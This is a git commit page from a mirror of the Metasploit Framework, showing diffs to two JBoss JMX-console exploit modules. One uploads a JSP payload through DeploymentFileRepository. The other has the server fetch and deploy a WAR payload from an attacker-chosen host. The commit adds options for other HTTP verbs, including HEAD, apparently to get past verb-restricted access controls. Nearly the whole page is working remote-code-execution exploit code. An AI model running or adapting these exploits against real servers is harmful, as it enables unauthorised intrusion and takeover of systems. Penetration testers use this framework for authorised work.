infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

make sure to use correct verbs, thanks mc! 

git-svn-id: file:///home/svn/framework3/trunk@9285 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-05-11 16:20:46 +00:00
parent 4cfc84a2e4
commit 711e08b5e9
2 changed files with 75 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

39
modules/exploits/multi/http/jboss_deploymentfilerepository.rb
View File

@ -67,21 +67,40 @@ class Metasploit3 < Msf::Exploit::Remote
fname = rand_text_alpha_upper(rand(5) + 1) fname = rand_text_alpha_upper(rand(5) + 1)
res = send_request_cgi( data = 'action=invokeOp'
{ data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
'uri' => '/jmx-console/HtmlAdaptor', data << '&methodIndex=5'
'method' => datastore['VERB'], data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
'data' => 'action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=' + data << '&arg1=' + fname
Rex::Text.uri_encode(datastore['PATH']) + '&arg1=' + fname + '&arg2=.jsp&arg3=' + data << '&arg2=.jsp'
Rex::Text.uri_encode(payload.encoded) + '&arg4=True', data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
}) data << '&arg4=True'
if (datastore['VERB'] == "POST")
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor',
'method' => datastore['VERB'],
'data' => data
})
else
res = send_request_cgi(
{
'uri' => '/jmx-console/HtmlAdaptor;index.jsp?' + data,
'method' => datastore['VERB'],
})
end
if (res.code == 200) if (res.code == 200)
print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...") print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
send_request_raw( send_request_raw(
{ {
'uri' => datastore['URI'] + fname + '.jsp', 'uri' => datastore['URI'] + fname + '.jsp',
'method' => 'GET', 'method' => verb,
}) })
else else
print_error("Denied...") print_error("Denied...")

66
modules/exploits/multi/http/jboss_maindeployer.rb
View File

@ -71,8 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
Opt::RPORT(8080), Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as' ]), OptString.new('USERNAME', [ false, 'The username to authenticate as' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username' ]), OptString.new('PASSWORD', [ false, 'The password for the specified username' ]),
OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console']), OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),
OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST']), OptString.new('VERB', [ true, 'The HTTP verb to use', 'POST' ]),
OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),
], self.class) ], self.class)
end end
@ -149,21 +150,42 @@ class Metasploit3 < Msf::Exploit::Remote
'Path' => resource_uri 'Path' => resource_uri
}}) }})
print_status("Making the request to the MainDeployer...") if (datastore['WARHOST'])
res = send_request_cgi({ service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
'method' => datastore['VERB'], end
'uri' => datastore['PATH'] + '/HtmlAdaptor', #method_index = jboss_detect_method_index
'vars_post' => print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
{ if (datastore['VERB'] == "POST")
'action' => 'invokeOp', res = send_request_cgi({
'name' => 'jboss.system:service=MainDeployer', 'method' => datastore['VERB'],
# deploy via java.net.URL 'uri' => datastore['PATH'] + '/HtmlAdaptor',
'methodIndex' => '3', # jboss 4.0.5 'vars_post' =>
#'methodIndex' => '21', # jboss 3.0.8 {
#'methodIndex' => '23', # jboss 3.2.7 'action' => 'invokeOp',
'arg0' => service_url 'name' => 'jboss.system:service=MainDeployer',
} # deploy via java.net.URL
}, 20) 'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
else
res = send_request_cgi({
'method' => datastore['VERB'],
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_get' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
# deploy via java.net.URL
'methodIndex' => '3', # jboss 4.0.5
#'methodIndex' => '21', # jboss 3.0.8
#'methodIndex' => '23', # jboss 3.2.7
'arg0' => service_url
}
})
end
if (! res) if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]" raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end end
@ -194,10 +216,14 @@ class Metasploit3 < Msf::Exploit::Remote
# EXECUTE # EXECUTE
# #
print_status("Executing #{app_base}...") print_status("Executing #{app_base}...")
verb = 'GET'
if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
verb = 'HEAD'
end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp', 'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => 'GET' 'method' => verb
}, 20) }, 20)
if (! res) if (! res)
print_error("Execution failed on #{app_base} [No Response]") print_error("Execution failed on #{app_base} [No Response]")